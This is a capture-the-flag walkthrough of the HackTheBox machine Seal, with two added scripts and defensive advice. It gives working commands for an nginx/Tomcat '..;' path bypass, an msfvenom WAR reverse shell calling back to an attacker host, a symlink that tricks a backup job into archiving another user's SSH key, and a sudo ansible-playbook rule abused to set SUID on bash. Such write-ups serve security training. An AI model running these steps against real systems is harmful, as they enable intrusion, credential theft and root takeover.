HackTheBox Walkthrough : Seal

Today we have another challenge from HackTheBox called Seal. In this lab we enumerate a GitBucket instance, recover Tomcat credentials and the nginx configuration that explains a 403 on the manager path, bypass that restriction with a path-parameter trick, get a shell through a WAR deployment, move to the user luis by abusing a scheduled Ansible backup, and finish with a passwordless sudo rule for ansible-playbook to get root. So without wasting time, let's start.

Level : Medium

Attacking Strategy

  • Recon
    • Nmap
  • Enumeration
    • GitBucket Enumeration
    • Credential Discovery
    • Bypass restriction
  • Exploitation
    • Tomcat Reverse shell
  • Privilege Escalation
    • Sudoers privilege escalation
    • ansible-playbook

Walkthrough

IP Address : 10.10.10.250

We start with an nmap scan, which identifies the open ports and the services running on the target.

nmap -p- -sC -sV --min-rate 10000 -oN nmap 10.10.10.250
Nmap scan report for 10.10.10.250
Host is up (1.2s latency).
Not shown: 64840 filtered ports, 692 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4b:89:47:39:67:3d:07:31:5e:3f:4c:27:41:1f:f9:67 (RSA)
|   256 04:a7:4f:39:95:65:c5:b0:8d:d5:49:2e:d8:44:00:36 (ECDSA)
|_  256 b4:5e:83:93:c5:42:49:de:71:25:92:71:23:b1:85:54 (ED25519)
443/tcp  open  ssl/http   nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Seal Market
| ssl-cert: Subject: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK
| Not valid before: 2021-05-05T10:24:03
|_Not valid after:  2022-05-05T10:24:03
| tls-alpn: 
|_  http/1.1
| tls-nextprotoneg: 
|_  http/1.1
8080/tcp open  http-proxy

From the result: port 22 is SSH, port 443 is HTTPS served by nginx 1.18.0, and port 8080 carries another HTTP service that nmap could only label as http-proxy. The certificate's common name is seal.htb, so add that name to /etc/hosts before browsing. The landing page on 443 is a normal market site that does not reveal anything useful on its own.

Enumeration

After looking at the landing page we move on to content discovery of the web server to find other endpoints of the application; feroxbuster helps here.

feroxbuster -u https://seal.htb -k

Unknown paths return a Tomcat-style 404 page rather than an nginx one, so Apache Tomcat sits behind the nginx proxy. That gives us an idea for exploitation: if we can reach the Tomcat manager and upload a WAR payload, we can get a reverse shell.

From previous experience, if we can reach the manager's HTML page we can upload a WAR file and trigger the payload from there, but here /manager/html returns a 403.

After spending some time on this path we turn to port 8080, where GitBucket is running. Registration is open, so we simply create a user and log in. The repositories section lists two repos, seal_market and infra; seal_market matches the site name, so we start enumerating it.

It holds the hosted application code and configuration, with 13 commits, and the commit history also gives us two usernames, alex and luis.

Among the commits there are changes to the Tomcat configuration, specifically tomcat-users.xml, from which we get the credentials (a secret committed to a repository that anyone can register for).

Username : tomcat

Password : 42MrHBf*z8{Z%

Enumerating the nginx configuration in the same repository explains why https://seal.htb/manager/html returns 403: the proxy has a location rule for that exact path that rejects our request before it ever reaches Tomcat.

The rule is matched against the path as nginx sees it, but Tomcat parses paths differently: it treats anything after a ; in a segment as a path parameter and strips it before resolving the path. So a request such as /manager/status/..;/html does not match the nginx rule for /manager/html, yet Tomcat normalizes it to /manager/html and serves the manager. This is the Tomcat path traversal via reverse proxy mapping technique (Orange Tsai, "Breaking Parser Logic", Black Hat USA 2018). After supplying the credentials from tomcat-users.xml we land on the manager HTML page.
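To make the mismatch concrete, here is a toy model of the two parsers side by side. This is an added example written for this write-up, not code from the original post or from nginx or Tomcat; DENY_PREFIX stands in for the real nginx rule, whose exact text the post does not reproduce (an assumption), and percent-decoding and query strings are left out.

```python
"""
Toy model of why a `;` in the path gets past nginx's /manager/html rule.

Added example, not from the original write-up or either server. It reproduces
two real behaviours in miniature:
  * nginx resolves `.`/`..` and merges slashes, then does a plain string prefix
    match for `location /manager/html`; a `;` is just an ordinary character.
  * Tomcat strips `;param` path parameters from every segment *before* it
    normalizes the path and routes it to a servlet.
DENY_PREFIX is an assumption standing in for the real nginx location rule.
"""

DENY_PREFIX = "/manager/html"


def normalize_dots(path: str) -> str:
    """Resolve `.` and `..` segments and collapse repeated slashes."""
    out: list[str] = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def nginx_decision(raw_path: str) -> str:
    """What the reverse proxy does with the request: '403' or 'proxy'."""
    seen_by_nginx = normalize_dots(raw_path)
    return "403" if seen_by_nginx.startswith(DENY_PREFIX) else "proxy"


def tomcat_route(raw_path: str) -> str:
    """The path Tomcat dispatches after dropping `;...` from every segment."""
    stripped = "/".join(seg.split(";", 1)[0] for seg in raw_path.split("/"))
    return normalize_dots(stripped)


def bypasses_filter(raw_path: str) -> bool:
    """True when nginx proxies the request but Tomcat lands on the protected path."""
    return (nginx_decision(raw_path) == "proxy"
            and tomcat_route(raw_path).startswith(DENY_PREFIX))


if __name__ == "__main__":
    for p in ["/manager/html", "/manager/status",
              "/manager/status/..;/html", "/manager/;x/html"]:
        print(f"{p:28} nginx={nginx_decision(p):5} "
              f"tomcat={tomcat_route(p):16} bypass={bypasses_filter(p)}")
```

The lesson for the defender is that a string match in the proxy can never be tighter than the backend's own parser. Remove the manager application if it is not needed, or enforce the restriction where the final path is known (Tomcat's own RemoteAddrValve in the manager's context.xml); at the very least deny the whole /manager prefix rather than one leaf path, so no segment games help.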

Exploitation

The interesting Tomcat path is /manager/html: from there you can upload and deploy WAR files, and a WAR can carry a payload that is trivially triggered to get a reverse shell.

To create the payload we use msfvenom from Metasploit and catch the reverse TCP shell on port 1234.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.28 LPORT=1234 -f war > sky.war 
file sky.war 

Now simply upload the WAR file, with one twist: the upload form posts to /manager/html/upload, which is again covered by the nginx restriction. Intercept the request in Burp Suite, rewrite the path with the same ; trick used to reach the manager page, and forward it.

After a successful upload the application appears in the manager page and we can trigger it from there: click the deployed path while netcat listens on port 1234, and we get a shell as the tomcat user.

Privilege Escalation

Now it is time for privilege escalation. Enumerating the box and watching the process list for a while shows that every few seconds ansible-playbook runs as the user luis, executing /opt/backups/playbook/run.yml.

Inspecting run.yml shows that it archives /var/lib/tomcat9/webapps/ROOT/admin/dashboard into /opt/backups/archives/. We have no write access to dashboard itself, but we can write to its uploads directory, so we place a symbolic link to luis's .ssh directory there and let the backup follow it.

ln -s /home/luis/.ssh/ /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads

After a few seconds a new archive appears under /opt/backups/archives. We copy it to /tmp and unpack it, and the copy of luis's .ssh directory inside contains his id_rsa.
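The following script simulates that backup job end to end so the failure mode can be seen without the box. It is an added example, not the playbook from the machine or any code from the original post: the directory names are stand-ins for /home/luis/.ssh and the dashboard path, the "key" is a constructed placeholder string, and the assumption that the real job dereferenced symlinks (ansible's archive module does so when copy_links is set) is modelled with tar -h.

```bash
#!/usr/bin/env bash
# Added example, not from the original write-up: a self-contained simulation of
# the backup job abused above. Everything lives in a throwaway temp directory;
# the directory names are stand-ins for /home/luis/.ssh and
# /var/lib/tomcat9/webapps/ROOT/admin/dashboard, and the "key" is a constructed
# placeholder string, not real key material.
set -euo pipefail

WORK="$(mktemp -d)"
trap 'rm -rf "$WORK"' EXIT

SECRET_DIR="$WORK/home/luis/.ssh"                 # owned by the backup user
DASHBOARD="$WORK/webapps/ROOT/admin/dashboard"    # what run.yml archives
mkdir -p "$SECRET_DIR" "$DASHBOARD/uploads" "$WORK/archives"
printf 'FAKE-PRIVATE-KEY-FOR-DEMO\n' > "$SECRET_DIR/id_rsa"

# Attacker step: the web user can only write to uploads/, so the symlink goes there.
ln -s "$SECRET_DIR" "$DASHBOARD/uploads/ssh"

# Run the backup and print the archive listing.
#   follow   : tar -h (dereference), the behaviour the write-up relies on; the
#              archive module does this when copy_links is set (assumed here).
#   nofollow : default tar, the link is stored as a link.
backup_and_list() {
  local name="$1" deref=""
  if [ "$name" = "follow" ]; then deref="-h"; fi
  tar -C "$DASHBOARD" $deref -czf "$WORK/archives/$name.tar.gz" .
  tar -tzf "$WORK/archives/$name.tar.gz"
}

# Prints LEAK if the private key ended up inside the archive, SAFE otherwise.
key_exposure() {
  local listing
  listing="$(backup_and_list "$1")"
  case "$listing" in
    *uploads/ssh/id_rsa*) echo "LEAK" ;;
    *)                    echo "SAFE" ;;
  esac
}

echo "backup following symlinks (tar -h / copy_links): $(key_exposure follow)"
echo "backup storing symlinks as links              : $(key_exposure nofollow)"
```

Not dereferencing links is only half of the fix. The root cause is a privileged job that reads from a directory a lower-privileged account can write into; the archive should be taken from a path the web user cannot modify, or the writable uploads directory excluded from it.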

With the private key we can log in to the server as luis without a password.

-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----
chmod 0600 key
ssh -i key luis@10.10.10.250

Enumerating the privileges of luis (sudo -l) shows that he can run ansible-playbook as root without a password. GTFOBins has an entry for exactly this, which gives us the idea.

We create a playbook whose only task sets the SUID bit on the bash binary, run it through sudo, and then spawn a privileged bash with -p.

nano root.yml

Contents of root.yml:

- hosts: localhost
  tasks:
  - name: Execute a command using the shell module
    shell: chmod u+s /bin/bash

Run it and use the SUID bash:

sudo ansible-playbook root.yml
ls -la /bin/bash
/bin/bash -p
id
cd /root
cat root.txt

Finally we have root and can collect the flags.
